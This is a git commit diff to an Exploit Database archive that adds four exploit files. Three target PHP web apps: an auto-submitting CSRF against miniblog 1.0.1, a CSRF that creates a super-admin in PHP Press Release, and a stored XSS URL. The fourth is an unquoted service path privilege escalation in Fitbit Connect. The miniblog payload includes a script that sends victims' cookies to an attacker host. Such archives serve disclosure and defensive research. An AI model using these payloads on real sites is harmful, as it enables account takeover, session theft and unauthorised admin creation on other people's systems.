DB: 2016-10-10
4 new exploits miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post) Fitbit Connect Service - Unquoted Service Path Privilege Escalation PHP Press Release - Cross-Site Request Forgery (Add Admin) PHP Press Release - Stored Cross Site Scripting
This commit is contained in:
Offensive Security
parent
cda049fa54
commit
8ea4614148
5 changed files with 128 additions and 0 deletions
|
|
@ -36597,3 +36597,7 @@ id,file,description,date,author,platform,type,port
|
||||||
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
|
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
|
||||||
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
|
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
|
||||||
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
|
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
|
||||||
|
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
|
||||||
|
40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
|
||||||
|
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
|
||||||
|
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
|
||||||
|
|
|
||||||
|
Can't render this file because it is too large.
|
38
platforms/php/webapps/40480.txt
Executable file
38
platforms/php/webapps/40480.txt
Executable file
|
|
@ -0,0 +1,38 @@
|
||||||
|
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
|
||||||
|
# Author : Besim
|
||||||
|
# Google Dork :
|
||||||
|
# Date : 09/10/2016
|
||||||
|
# Type : webapps
|
||||||
|
# Platform : PHP
|
||||||
|
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
|
||||||
|
# Software link :
|
||||||
|
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
|
||||||
|
|
||||||
|
|
||||||
|
Description (admin login required) :
|
||||||
|
|
||||||
|
miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
|
||||||
|
edit article in the sections
|
||||||
|
|
||||||
|
Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add
|
||||||
|
|
||||||
|
Dangerous point : if used with XSS can be steal on the admin's cookie information.
|
||||||
|
|
||||||
|
|
||||||
|
*############### CSRF PoC ###############*
|
||||||
|
|
||||||
|
|
||||||
|
<html> <!-- CSRF PoC --> <body> <form action="
|
||||||
|
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
|
||||||
|
method="POST"> <input type="hidden" name="data[post_title]"
|
||||||
|
value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie;</script>"
|
||||||
|
/> <input type="hidden" name="data[post_content]"
|
||||||
|
value="tester" /> <input type="hidden" name="data[published]"
|
||||||
|
value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add"
|
||||||
|
/> <input type="submit" value="Submit request" /> </form> <script>
|
||||||
|
document.forms[0].submit(); </script> </body> </html>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
########################################
|
||||||
|
|
||||||
35
platforms/php/webapps/40486.txt
Executable file
35
platforms/php/webapps/40486.txt
Executable file
|
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title : PHP Press Release - Cross-Site Request Forgery (Add Admin - Super User )
|
||||||
|
# Author : Besim
|
||||||
|
# Google Dork : -
|
||||||
|
# Date : 09/10/2016
|
||||||
|
# Type : webapps
|
||||||
|
# Platform : PHP
|
||||||
|
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
|
||||||
|
Software link :
|
||||||
|
http://www.pagereactions.com/downloads/phppressrelease.zip
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
########################### CSRF PoC ###############################
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC -->
|
||||||
|
<body>
|
||||||
|
<form action="http://sitename/phppressrelease/administration.php" method="POST">
|
||||||
|
<input type="hidden" name="pageaction" value="saveuser" />
|
||||||
|
<input type="hidden" name="subaction" value="submit" />
|
||||||
|
<input type="hidden" name="username" value="murat" />
|
||||||
|
<input type="hidden" name="password" value="murat" />
|
||||||
|
<input type="hidden" name="userfullname" value="murat tester" />
|
||||||
|
<input type="hidden" name="accesslevel" value="Super" />
|
||||||
|
<input type="hidden" name="userstatus" value="active" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
*document.forms[0].submit();*
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
####################################################################
|
||||||
22
platforms/php/webapps/40487.txt
Executable file
22
platforms/php/webapps/40487.txt
Executable file
|
|
@ -0,0 +1,22 @@
|
||||||
|
# Exploit Title : PHP Press Release* - Stored Cross Site
|
||||||
|
Scripting*
|
||||||
|
# Author : Besim
|
||||||
|
# Google Dork : -
|
||||||
|
# Date : 09/10/2016
|
||||||
|
# Type : webapps
|
||||||
|
# Platform : PHP
|
||||||
|
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
|
||||||
|
# Software link :
|
||||||
|
http://www.pagereactions.com/downloads/phppressrelease.zip
|
||||||
|
|
||||||
|
|
||||||
|
Description :
|
||||||
|
|
||||||
|
Vulnerable link :
|
||||||
|
http://site_name/phppressrelease/administration.php?pageaction=newrelease
|
||||||
|
|
||||||
|
Stored XSS Payload :
|
||||||
|
|
||||||
|
http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active
|
||||||
|
|
||||||
|
|
||||||
29
platforms/windows/local/40482.txt
Executable file
29
platforms/windows/local/40482.txt
Executable file
|
|
@ -0,0 +1,29 @@
|
||||||
|
Fitbit Connect Service: https://www.fitbit.com/
|
||||||
|
By Ross Marks: http://www.rossmarks.co.uk
|
||||||
|
Exploit-db: https://www.exploit-db.com/author/?a=8724
|
||||||
|
Category: Local
|
||||||
|
Tested on: Windows 10 x86/x64
|
||||||
|
|
||||||
|
1) Unquoted Service Path Privilege Escalation
|
||||||
|
|
||||||
|
Fitbit connect installs as a service with an unquoted service path running with SYSTEM privileges.
|
||||||
|
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
|
||||||
|
|
||||||
|
A successful attempt would require the local attacker must insert an executable file in the path of the service.
|
||||||
|
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
C:\>sc qc "Fitbit Connect"
|
||||||
|
[SC] QueryServiceConfig SUCCESS
|
||||||
|
|
||||||
|
SERVICE_NAME: Fitbit Connect
|
||||||
|
TYPE : 10 WIN32_OWN_PROCESS
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : Fitbit Connect Service
|
||||||
|
DEPENDENCIES :
|
||||||
|
SERVICE_START_NAME : NT AUTHORITY\NetworkService
|
||||||
Loading…
Add table
Reference in a new issue